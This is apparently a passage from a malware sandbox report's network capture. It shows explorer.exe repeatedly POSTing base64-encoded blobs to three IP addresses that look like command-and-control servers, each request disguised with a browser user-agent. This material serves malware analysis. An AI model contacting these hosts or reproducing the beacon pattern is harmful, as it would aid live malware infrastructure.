EX/hoGAHgPZ0VYSNEscpA9C/0x6Ded9ivP9/hTyPLyv8uyXU7eBczo+T8sdYC9UBSlQTJGER20YEJaSOyJAueRjWe6L4SpDh2uAly7yhKGkMYr8xCZl8OcXiBQSRLz7Erjua3GGdx5Me0M8acRL/McO7QxyspxVJzkBngKXd4vt47ZizD2oAinw51FBZFE6OoYqdqKh03LdwA1loWwgrmW5f4zP/xzu/9j4gjt+jvuGSgDWtgHkhOAkWHqa9MCt
2024-07-27 06:55:34 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:34 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:34 UTC	685	IN	Data Raw: 30 36 66 66 44 31 4d 4b 62 43 4d 4d 64 58 45 59 6c 45 61 58 73 66 77 47 77 35 47 47 31 7a 6c 56 67 53 7a 2b 62 2b 47 4d 4b 35 51 31 52 75 64 43 4d 30 34 7a 68 4f 4e 68 6b 30 5a 4e 6b 6c 46 53 32 7a 77 47 64 44 6e 38 73 2f 59 43 6d 4d 67 35 68 6f 4b 73 6d 76 36 7a 2b 4d 7a 4c 51 30 63 4a 75 45 6c 75 4a 6d 52 77 61 79 36 6d 75 32 78 61 50 42 63 37 49 61 38 63 68 6a 68 64 37 42 74 38 7a 48 6f 44 51 38 78 5a 6c 6e 32 31 47 58 54 4b 53 33 59 79 35 38 7a 4e 4f 63 58 46 32 69 68 4b 57 4f 39 65 53 72 69 68 30 62 34 57 64 46 2f 72 32 48 41 4b 48 6a 6c 6c 4a 78 79 70 75 70 70 4d 7a 35 37 69 32 51 77 39 65 62 56 78 4e 6c 30 72 47 49 69 6c 48 34 30 32 47 38 68 54 72 67 52 73 42 4a 65 75 69 72 42 4d 42 68 67 31 79 44 64 7a 35 33 6b 76 70 43 53 49 56 49 31 31 35 35 66 Data Ascii: 06ffD1MKbCMMdXEYlEaXsfwGw5GG1zlVgSz+b+GMK5Q1RudCM04zhONhk0ZNklFS2zwGdDn8s/YCmMg5hoKsmv6z+MzLQ0cJuEluJmRway6mu2xaPBc7Ia8chjhd7Bt8zHoDQ8xZln21GXTKS3Yy58zNOcXF2ihKWO9eSrih0b4WdF/r2HAKHjllJxypuppMz57i2Qw9ebVxNl0rGIilH402G8hTrgRsBJeuirBMBhg1yDdz53kvpCSIVI1155f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50788	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:35 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:35 UTC	1122	OUT	Data Raw: 48 45 6c 30 33 42 4d 55 62 57 77 79 45 59 45 76 6f 49 71 71 4d 34 32 44 30 39 47 56 57 56 46 35 36 56 4c 71 77 47 62 6b 43 65 62 39 35 59 6b 36 6a 4f 63 71 36 45 6f 46 73 75 77 45 79 59 64 78 2b 4f 43 30 4e 2b 4b 44 64 57 2b 37 6c 35 57 57 53 76 33 6c 37 42 72 48 30 61 58 72 55 44 4d 31 55 61 68 44 78 38 32 4a 4c 43 52 43 6b 44 4b 77 35 62 54 75 64 42 5a 34 73 51 66 53 58 6e 77 31 4b 56 42 76 6c 63 77 61 4a 76 35 2f 68 57 51 64 44 31 64 6d 65 41 59 65 72 6c 39 2f 46 36 65 62 78 78 63 6e 37 6c 70 34 46 68 69 5a 4d 71 45 6b 67 77 77 58 5a 63 74 70 53 31 5a 71 2b 49 39 4c 46 57 4c 78 58 34 59 4b 50 58 53 44 5a 4c 6a 64 45 57 62 37 39 4b 69 56 64 42 30 36 55 33 64 63 6e 67 32 73 56 74 71 37 4e 7a 53 45 69 51 56 45 69 72 64 36 78 58 63 64 4f 2b 6a 7a 73 31 6a Data Ascii: HEl03BMUbWwyEYEvoIqqM42D09GVWVF56VLqwGbkCeb95Yk6jOcq6EoFsuwEyYdx+OC0N+KDdW+7l5WWSv3l7BrH0aXrUDM1UahDx82JLCRCkDKw5bTudBZ4sQfSXnw1KVBvlcwaJv5/hWQdD1dmeAYerl9/F6ebxxcn7lp4FhiZMqEkgwwXZctpS1Zq+I9LFWLxX4YKPXSDZLjdEWb79KiVdB06U3dcng2sVtq7NzSEiQVEird6xXcdO+jzs1j
2024-07-27 06:55:36 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:36 UTC	685	IN	Data Raw: 6b 4b 54 54 4e 41 64 4b 6c 57 43 51 55 2f 64 69 63 59 61 70 78 70 4a 4f 6a 47 70 56 66 63 33 4f 42 70 48 54 62 7a 6b 38 4d 54 4b 4a 37 30 4c 45 66 70 71 4f 68 6e 51 41 72 46 2f 77 38 67 38 47 74 2b 50 76 4d 41 43 46 37 37 4f 34 4e 70 69 7a 51 72 42 4c 37 51 66 78 68 53 45 53 79 4f 79 7a 44 6f 4c 4c 6d 44 6d 37 76 65 51 43 50 4d 6a 45 35 38 75 47 44 66 64 4e 2b 4d 76 79 39 66 56 4b 52 32 70 66 30 42 73 4f 30 4b 33 2b 4e 38 63 7a 58 7a 77 5a 46 46 71 4b 66 47 2f 70 65 64 38 47 46 76 35 50 65 70 44 6a 39 38 2b 32 33 31 2b 4d 42 74 71 57 39 43 39 42 45 6a 2b 59 73 79 78 37 47 56 54 42 38 4c 48 45 2f 77 42 6e 4a 66 79 57 39 2f 2f 52 66 38 6b 52 48 53 51 32 54 70 43 78 30 37 36 65 58 74 56 4f 37 73 51 69 45 38 71 47 4f 32 62 69 77 46 7a 38 74 76 35 67 50 64 48 Data Ascii: kKTTNAdKlWCQU/dicYapxpJOjGpVfc3OBpHTbzk8MTKJ70LEfpqOhnQArF/w8g8Gt+PvMACF77O4NpizQrBL7QfxhSESyOyzDoLLmDm7veQCPMjE58uGDfdN+Mvy9fVKR2pf0BsO0K3+N8czXzwZFFqKfG/ped8GFv5PepDj98+231+MBtqW9C9BEj+Ysyx7GVTB8LHE/wBnJfyW9//Rf8kRHSQ2TpCx076eXtVO7sQiE8qGO2biwFz8tv5gPdH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	50789	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:37 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:37 UTC	1122	OUT	Data Raw: 4b 41 66 63 78 54 4a 61 7a 6f 54 33 34 53 30 55 43 78 71 79 70 75 39 67 63 67 36 4e 55 4e 67 73 56 53 65 45 43 51 67 45 33 6d 6e 41 58 36 6e 39 65 7a 69 73 78 70 6d 68 4e 74 46 64 51 50 67 4e 63 6f 7a 75 42 4a 44 5a 2f 77 32 35 68 2b 6a 38 75 71 61 54 64 34 78 36 56 58 41 71 68 57 65 59 6f 39 6e 47 71 43 65 43 50 5a 61 48 44 45 2f 61 7a 50 44 47 35 44 4f 74 41 41 31 62 44 51 47 75 53 7a 6c 69 6e 7a 54 5a 41 4a 65 34 78 32 71 2b 62 7a 2b 6c 68 31 64 52 36 68 51 36 45 53 58 4e 4d 43 69 6b 4e 30 43 71 73 76 2b 6f 57 66 2b 4f 66 61 51 77 49 53 48 61 59 63 37 4a 44 49 70 58 66 49 32 75 5a 45 61 54 4a 77 62 47 4a 64 48 69 77 39 62 57 6e 4b 37 6f 75 31 49 63 67 6d 55 42 6b 78 6f 4d 62 54 63 70 51 43 54 32 4a 6f 4e 68 64 44 68 72 76 39 6d 62 56 67 5a 72 65 52 2b Data Ascii: KAfcxTJazoT34S0UCxqypu9gcg6NUNgsVSeECQgE3mnAX6n9ezisxpmhNtFdQPgNcozuBJDZ/w25h+j8uqaTd4x6VXAqhWeYo9nGqCeCPZaHDE/azPDG5DOtAA1bDQGuSzlinzTZAJe4x2q+bz+lh1dR6hQ6ESXNMCikN0Cqsv+oWf+OfaQwISHaYc7JDIpXfI2uZEaTJwbGJdHiw9bWnK7ou1IcgmUBkxoMbTcpQCT2JoNhdDhrv9mbVgZreR+
2024-07-27 06:55:38 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:38 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:38 UTC	685	IN	Data Raw: 6a 4e 4a 52 64 42 63 41 59 7a 54 34 49 67 58 71 51 2f 58 50 6a 53 73 68 49 55 4f 4c 52 32 4b 75 66 51 41 70 32 6c 32 35 67 2f 54 35 33 44 56 42 47 45 79 74 4f 49 63 55 54 73 66 49 51 31 43 59 61 2b 55 6a 45 44 64 66 48 67 74 38 38 4f 35 57 48 6f 6c 32 4b 4c 6e 65 49 59 54 74 35 73 4d 57 4c 6c 59 54 35 74 6c 71 41 6a 51 42 6d 38 71 38 57 6b 70 59 2b 72 68 48 55 65 69 32 34 53 37 30 5a 78 70 77 35 61 4d 63 43 74 75 30 73 48 72 4d 43 42 54 4d 4f 6a 48 65 62 38 48 69 4d 4d 6e 50 4c 69 50 6a 39 6c 46 77 45 58 2f 63 56 43 48 58 75 55 34 47 58 49 65 43 5a 50 6f 6f 68 55 30 68 6b 63 77 36 6d 4a 74 4d 4d 4d 6f 61 42 58 6d 37 39 6b 79 78 74 77 2b 67 50 50 4e 33 2f 4c 32 2b 51 57 63 72 78 64 2b 2f 45 47 35 4e 35 71 53 51 39 7a 7a 41 43 66 62 65 73 33 50 70 7a 4b 6e Data Ascii: jNJRdBcAYzT4IgXqQ/XPjSshIUOLR2KufQAp2l25g/T53DVBGEytOIcUTsfIQ1CYa+UjEDdfHgt88O5WHol2KLneIYTt5sMWLlYT5tlqAjQBm8q8WkpY+rhHUei24S70Zxpw5aMcCtu0sHrMCBTMOjHeb8HiMMnPLiPj9lFwEX/cVCHXuU4GXIeCZPoohU0hkcw6mJtMMMoaBXm79kyxtw+gPPN3/L2+QWcrxd+/EG5N5qSQ9zzACfbes3PpzKn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50790	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:39 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:39 UTC	1122	OUT	Data Raw: 4b 34 72 51 43 4f 74 5a 63 6f 55 65 64 57 34 62 49 46 76 6e 56 44 30 6a 4c 77 73 74 42 79 52 58 44 4c 72 77 68 77 2f 52 30 53 6d 55 58 7a 79 47 42 64 2f 41 4a 74 35 6c 58 46 4c 53 30 63 4f 71 55 6e 64 4a 4e 43 49 52 4b 53 38 4d 75 47 65 7a 61 44 52 69 6d 62 78 6a 56 45 4f 79 36 6f 67 47 49 61 4f 41 38 52 4d 70 5a 69 57 52 65 76 70 56 56 39 79 56 2b 6b 69 66 55 37 4f 67 77 2b 42 48 68 34 74 72 73 76 38 65 44 70 2f 46 39 31 4d 7a 2f 42 59 44 65 45 77 39 4f 6d 38 68 43 59 65 75 62 41 75 4c 31 38 44 43 46 2f 43 42 4e 46 69 2b 50 32 51 31 31 47 72 61 41 31 38 5a 64 35 78 59 70 2f 6c 74 6f 78 67 37 7a 70 6c 79 52 43 5a 51 63 32 56 7a 61 70 52 33 43 34 76 77 62 52 65 4e 48 7a 35 4a 6b 47 62 5a 70 61 53 41 72 6d 69 6f 30 6f 47 55 43 7a 4a 32 6b 70 34 63 39 7a 50 Data Ascii: K4rQCOtZcoUedW4bIFvnVD0jLwstByRXDLrwhw/R0SmUXzyGBd/AJt5lXFLS0cOqUndJNCIRKS8MuGezaDRimbxjVEOy6ogGIaOA8RMpZiWRevpVV9yV+kifU7Ogw+BHh4trsv8eDp/F91Mz/BYDeEw9Om8hCYeubAuL18DCF/CBNFi+P2Q11GraA18Zd5xYp/ltoxg7zplyRCZQc2VzapR3C4vwbReNHz5JkGbZpaSArmio0oGUCzJ2kp4c9zP
2024-07-27 06:55:40 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:40 UTC	685	IN	Data Raw: 71 49 6f 63 49 71 37 77 72 65 2f 6d 4f 48 53 57 33 6e 6f 4f 51 43 55 56 37 78 6c 79 7a 5a 73 71 66 4f 65 68 56 2f 52 73 36 68 6f 6d 75 33 39 63 36 43 77 42 2b 64 5a 42 39 53 36 38 41 47 49 4a 57 4c 67 35 48 33 4f 74 54 6e 41 6a 6f 4e 52 59 45 63 6a 68 53 75 39 35 57 73 43 6d 47 4f 78 79 74 6f 4f 4b 2b 62 49 69 7a 72 4c 44 6f 50 35 79 34 50 47 35 47 4c 35 69 4e 76 4b 6d 6b 47 66 64 66 49 4e 4a 2f 66 5a 64 61 6c 6a 53 36 50 37 66 34 69 46 70 69 34 57 43 58 55 7a 65 31 36 37 4f 76 53 65 76 43 44 41 6b 74 63 49 35 6b 7a 34 42 72 72 57 42 48 4e 6f 48 77 6a 48 39 72 6e 66 46 64 61 74 38 6c 32 48 47 53 41 34 69 49 64 58 30 76 64 76 34 55 70 35 55 2b 4a 73 64 70 4c 62 67 4a 55 42 36 67 69 42 46 78 61 38 2f 57 46 46 6c 73 51 47 6d 73 4b 32 6b 30 69 38 50 43 33 6f Data Ascii: qIocIq7wre/mOHSW3noOQCUV7xlyzZsqfOehV/Rs6homu39c6CwB+dZB9S68AGIJWLg5H3OtTnAjoNRYEcjhSu95WsCmGOxytoOK+bIizrLDoP5y4PG5GL5iNvKmkGfdfINJ/fZdaljS6P7f4iFpi4WCXUze167OvSevCDAktcI5kz4BrrWBHNoHwjH9rnfFdat8l2HGSA4iIdX0vdv4Up5U+JsdpLbgJUB6giBFxa8/WFFlsQGmsK2k0i8PC3o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50791	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:41 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:41 UTC	1122	OUT	Data Raw: 51 75 59 51 51 52 74 53 6e 57 6f 52 31 6a 37 5a 36 35 67 64 79 55 44 5a 4a 6f 4d 76 50 4f 6b 46 73 62 77 63 67 41 37 44 6f 32 42 50 6a 76 4a 73 33 61 73 63 54 35 47 6f 30 6f 63 55 50 4b 4b 2b 6f 74 4c 6b 4f 37 35 41 48 52 6f 77 6e 55 4d 54 43 59 37 33 49 35 6d 75 39 61 78 50 6c 53 58 38 49 5a 50 42 68 63 70 35 36 6d 30 4d 61 43 34 32 46 32 69 4a 54 42 39 4e 55 66 7a 36 57 59 53 76 4e 61 49 36 32 38 66 61 6f 4a 49 46 50 6f 30 58 58 51 55 38 34 6d 68 6f 33 4d 74 6b 4a 46 62 6c 61 7a 48 4d 74 4b 37 69 6e 30 74 48 2f 4e 75 69 57 66 73 33 32 58 75 6d 6f 36 44 6c 46 72 45 2f 79 6b 4c 33 52 4a 39 55 6f 79 35 61 33 6b 4b 55 67 74 41 45 59 46 50 5a 76 4e 67 32 66 59 6b 4c 4f 45 75 45 45 57 38 46 74 2f 2f 72 54 72 69 43 46 59 57 34 69 56 47 42 69 37 6d 37 75 4f 66 Data Ascii: QuYQQRtSnWoR1j7Z65gdyUDZJoMvPOkFsbwcgA7Do2BPjvJs3ascT5Go0ocUPKK+otLkO75AHRownUMTCY73I5mu9axPlSX8IZPBhcp56m0MaC42F2iJTB9NUfz6WYSvNaI628faoJIFPo0XXQU84mho3MtkJFblazHMtK7in0tH/NuiWfs32Xumo6DlFrE/ykL3RJ9Uoy5a3kKUgtAEYFPZvNg2fYkLOEuEEW8Ft//rTriCFYW4iVGBi7m7uOf
2024-07-27 06:55:42 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:42 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:42 UTC	685	IN	Data Raw: 71 73 69 77 50 74 4b 73 4f 43 59 37 7a 67 7a 79 4d 62 65 52 46 33 45 42 4d 6c 59 4f 64 38 7a 34 74 59 58 65 4f 34 6c 34 52 2f 39 47 43 79 5a 36 39 57 47 79 54 31 46 6b 54 32 62 56 6d 41 36 2f 5a 6c 56 70 4d 2b 50 61 32 49 7a 4f 78 72 42 7a 4b 6a 4a 50 51 30 6e 36 6b 56 4e 69 35 5a 6d 5a 4a 6c 61 50 50 4d 6e 44 72 39 4d 4d 50 67 57 61 49 62 39 77 5a 31 70 47 5a 4c 51 62 68 43 30 4f 41 30 2b 6f 74 47 61 4c 66 2b 6d 37 67 4a 79 51 2b 5a 61 37 71 70 6b 45 68 5a 73 62 52 4c 2b 2b 6d 71 72 57 47 6d 38 49 38 66 51 6c 65 37 52 53 59 6e 50 56 50 42 50 76 65 35 77 63 62 34 2f 78 5a 69 4c 59 58 34 61 72 62 32 54 52 71 6f 2b 34 31 36 65 58 39 76 4c 4d 5a 70 32 62 4c 6d 32 49 55 51 5a 4d 6f 53 4b 36 35 6c 34 69 72 54 51 54 50 38 73 6c 43 6b 54 2f 52 72 43 73 74 78 6b Data Ascii: qsiwPtKsOCY7zgzyMbeRF3EBMlYOd8z4tYXeO4l4R/9GCyZ69WGyT1FkT2bVmA6/ZlVpM+Pa2IzOxrBzKjJPQ0n6kVNi5ZmZJlaPPMnDr9MMPgWaIb9wZ1pGZLQbhC0OA0+otGaLf+m7gJyQ+Za7qpkEhZsbRL++mqrWGm8I8fQle7RSYnPVPBPve5wcb4/xZiLYX4arb2TRqo+416eX9vLMZp2bLm2IUQZMoSK65l4irTQTP8slCkT/RrCstxk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	50792	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:43 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:55:43 UTC	1267	OUT	Data Raw: 72 41 78 7a 37 61 49 71 34 78 46 33 4d 6e 58 50 71 74 30 7a 6a 77 4f 5a 43 61 6f 49 49 4b 73 46 71 42 53 63 72 51 70 2b 4c 61 75 7a 62 34 44 39 78 70 47 4c 4e 6d 69 6b 36 38 43 6d 37 61 4e 42 58 41 75 58 44 2b 6c 7a 54 36 4c 51 64 74 4f 62 59 7a 64 6d 4d 70 68 6a 6e 44 47 62 32 6a 4a 70 67 53 30 2f 54 6a 49 78 49 72 53 42 53 4e 33 4c 45 32 52 77 42 76 4c 43 66 49 50 4f 52 79 76 39 68 35 69 52 33 75 6d 69 72 55 65 4c 4a 69 74 2b 6c 2f 50 41 36 69 4e 76 45 36 6e 50 55 31 54 47 4f 44 32 41 66 41 77 70 66 41 69 6e 54 6e 34 64 6a 75 66 72 4e 56 6a 6a 52 78 38 6f 75 37 76 47 2b 45 41 45 67 66 38 2f 2b 6d 41 53 64 4a 61 4c 55 34 35 49 41 45 63 36 78 54 50 67 6a 4e 67 2b 6f 44 35 43 70 78 4a 48 51 4b 55 36 74 75 43 4d 79 44 4f 63 51 74 49 4c 6f 6e 5a 6b 70 2f 4a Data Ascii: rAxz7aIq4xF3MnXPqt0zjwOZCaoIIKsFqBScrQp+Lauzb4D9xpGLNmik68Cm7aNBXAuXD+lzT6LQdtObYzdmMphjnDGb2jJpgS0/TjIxIrSBSN3LE2RwBvLCfIPORyv9h5iR3umirUeLJit+l/PA6iNvE6nPU1TGOD2AfAwpfAinTn4djufrNVjjRx8ou7vG+EAEgf8/+mASdJaLU45IAEc6xTPgjNg+oD5CpxJHQKU6tuCMyDOcQtILonZkp/J
2024-07-27 06:55:44 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:44 UTC	685	IN	Data Raw: 46 57 52 39 65 69 65 39 32 52 4b 67 6e 79 64 42 49 50 39 47 4b 48 78 45 46 64 78 43 70 79 45 69 6b 65 55 36 38 67 62 68 6f 4d 34 61 2f 30 51 74 34 75 33 71 44 4a 72 51 4e 4e 74 61 6b 77 30 4a 5a 72 79 58 34 42 42 74 32 48 45 6b 74 36 4c 35 71 65 4e 67 73 2b 4b 41 30 66 5a 66 49 62 49 59 77 71 4d 73 79 4b 46 55 38 34 32 7a 49 31 7a 32 4a 75 77 55 2f 48 6b 59 39 34 66 72 33 59 4a 70 53 47 47 47 4e 6a 4b 43 30 71 38 74 5a 31 6c 63 54 4d 6a 6d 69 42 58 78 34 75 35 37 57 51 30 69 54 37 31 31 33 59 4a 6a 30 5a 45 2b 74 2b 4f 48 71 46 35 4b 58 6e 7a 4a 59 64 64 44 55 42 6c 31 42 6c 55 74 54 36 6c 73 78 44 37 48 6d 48 4e 67 34 55 31 4d 48 78 6e 70 77 4c 6d 56 6f 30 45 59 33 68 55 30 79 45 36 44 45 66 59 6c 39 61 64 4d 36 63 42 73 54 69 50 7a 43 61 63 64 74 73 4f Data Ascii: FWR9eie92RKgnydBIP9GKHxEFdxCpyEikeU68gbhoM4a/0Qt4u3qDJrQNNtakw0JZryX4BBt2HEkt6L5qeNgs+KA0fZfIbIYwqMsyKFU842zI1z2JuwU/HkY94fr3YJpSGGGNjKC0q8tZ1lcTMjmiBXx4u57WQ0iT7113YJj0ZE+t+OHqF5KXnzJYddDUBl1BlUtT6lsxD7HmHNg4U1MHxnpwLmVo0EY3hU0yE6DEfYl9adM6cBsTiPzCacdtsO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	50793	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:45 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:55:45 UTC	1267	OUT	Data Raw: 64 6b 31 31 30 44 38 77 63 5a 63 61 69 38 68 31 31 79 30 2b 63 74 43 49 6b 52 4b 6a 72 66 74 37 74 6a 56 4d 4b 44 76 4f 73 36 75 75 34 36 77 4c 32 79 30 53 73 43 54 65 68 50 4a 45 44 47 62 46 6e 6c 38 50 6d 32 64 34 47 62 57 34 4f 6b 6c 54 61 50 4e 4a 4f 42 69 77 37 6b 5a 75 57 4a 50 39 61 56 49 6e 44 79 48 5a 41 56 37 52 73 71 38 59 75 46 2b 33 49 61 68 59 79 50 31 73 4e 66 63 4d 67 35 56 4d 6e 46 65 41 41 64 43 4d 66 55 79 66 77 30 67 66 30 49 39 72 59 39 4d 6f 6a 4f 4c 4d 78 6b 4a 59 62 64 74 58 4f 6e 36 42 79 35 56 68 36 41 33 6c 57 79 4f 5a 45 38 63 33 74 4a 34 67 47 54 31 59 53 38 46 62 43 45 57 70 55 2b 6d 37 33 77 57 70 6e 58 75 6f 58 48 2b 4e 6b 71 75 68 53 59 6d 45 65 72 6f 30 48 4a 44 4c 64 4e 53 63 61 6d 6b 67 35 49 79 37 66 47 34 71 32 2b 32 Data Ascii: dk110D8wcZcai8h11y0+ctCIkRKjrft7tjVMKDvOs6uu46wL2y0SsCTehPJEDGbFnl8Pm2d4GbW4OklTaPNJOBiw7kZuWJP9aVInDyHZAV7Rsq8YuF+3IahYyP1sNfcMg5VMnFeAAdCMfUyfw0gf0I9rY9MojOLMxkJYbdtXOn6By5Vh6A3lWyOZE8c3tJ4gGT1YS8FbCEWpU+m73wWpnXuoXH+NkquhSYmEero0HJDLdNScamkg5Iy7fG4q2+2
2024-07-27 06:55:46 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:46 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:46 UTC	685	IN	Data Raw: 43 6e 59 64 69 71 76 6c 79 73 4c 6f 37 31 49 36 37 72 65 6e 63 47 62 53 54 30 4d 69 49 61 67 59 67 30 74 33 48 2f 2f 58 59 46 50 32 35 64 78 6b 4d 37 74 64 64 34 61 51 6e 6e 6f 45 69 45 74 5a 36 77 52 51 75 6d 31 6c 63 72 74 39 48 65 75 78 4d 77 4d 30 79 44 50 4c 62 33 33 77 2b 67 52 48 4f 70 75 6b 6b 6b 63 5a 39 44 44 39 38 4e 49 77 34 65 76 69 4d 44 64 7a 4b 61 6c 46 63 59 70 69 79 73 30 30 52 4e 49 57 71 2f 44 6c 74 42 4d 4c 4f 4f 47 70 43 79 35 78 59 41 58 69 2f 4c 43 79 79 68 70 46 69 39 62 68 47 46 5a 35 38 4e 67 4d 78 57 75 56 73 65 64 4f 75 50 61 48 4c 73 66 47 53 4c 6b 65 41 77 59 46 52 4d 38 48 41 2b 46 68 47 49 68 68 2f 65 65 7a 57 53 67 78 63 69 4d 4d 36 77 52 71 59 34 6e 67 47 2f 6e 33 43 33 55 4b 52 52 39 6c 74 6d 62 77 7a 4f 2b 7a 46 6f 4e Data Ascii: CnYdiqvlysLo71I67rencGbST0MiIagYg0t3H//XYFP25dxkM7tdd4aQnnoEiEtZ6wRQum1lcrt9HeuxMwM0yDPLb33w+gRHOpukkkcZ9DD98NIw4eviMDdzKalFcYpiys00RNIWq/DltBMLOOGpCy5xYAXi/LCyyhpFi9bhGFZ58NgMxWuVsedOuPaHLsfGSLkeAwYFRM8HA+FhGIhh/eezWSgxciMM6wRqY4ngG/n3C3UKRR9ltmbwzO+zFoN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	50794	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:47 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:47 UTC	1122	OUT	Data Raw: 41 67 68 4d 34 43 52 74 52 67 42 73 31 4e 49 33 47 62 37 4f 4b 4d 62 53 2b 33 42 5a 79 35 34 58 70 39 59 63 30 53 45 39 35 4d 6c 79 31 54 63 65 63 37 45 4b 66 35 59 79 58 55 42 63 68 2f 30 53 49 32 36 39 79 30 74 4d 4e 70 45 41 72 55 70 4b 62 41 53 53 42 53 39 4e 7a 75 4e 78 38 2f 69 64 2f 67 4c 43 35 48 30 4e 2f 49 34 63 6e 4a 68 41 77 30 6b 2f 43 43 44 51 64 50 43 44 35 53 4c 55 4b 6a 38 48 4c 39 70 78 76 41 54 56 47 37 31 2b 38 50 47 73 74 66 61 69 47 4a 69 58 6b 51 2f 6f 45 50 53 74 65 79 6d 34 38 50 49 31 42 64 6f 4b 76 51 77 50 68 79 73 36 45 55 4c 48 74 6d 77 54 71 74 35 51 41 55 30 4d 77 43 59 79 41 78 41 58 30 69 35 37 6b 70 4b 30 64 75 4e 30 6e 4e 38 59 50 68 39 31 62 37 73 2f 49 69 71 53 44 41 63 4f 47 42 5a 5a 6b 52 73 59 56 2b 38 43 56 33 61 Data Ascii: AghM4CRtRgBs1NI3Gb7OKMbS+3BZy54Xp9Yc0SE95Mly1Tcec7EKf5YyXUBch/0SI269y0tMNpEArUpKbASSBS9NzuNx8/id/gLC5H0N/I4cnJhAw0k/CCDQdPCD5SLUKj8HL9pxvATVG71+8PGstfaiGJiXkQ/oEPSteym48PI1BdoKvQwPhys6EULHtmwTqt5QAU0MwCYyAxAX0i57kpK0duN0nN8YPh91b7s/IiqSDAcOGBZZkRsYV+8CV3a
2024-07-27 06:55:48 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:48 GMT Content-Type: text/plain; charset=utf-8 Connection: close
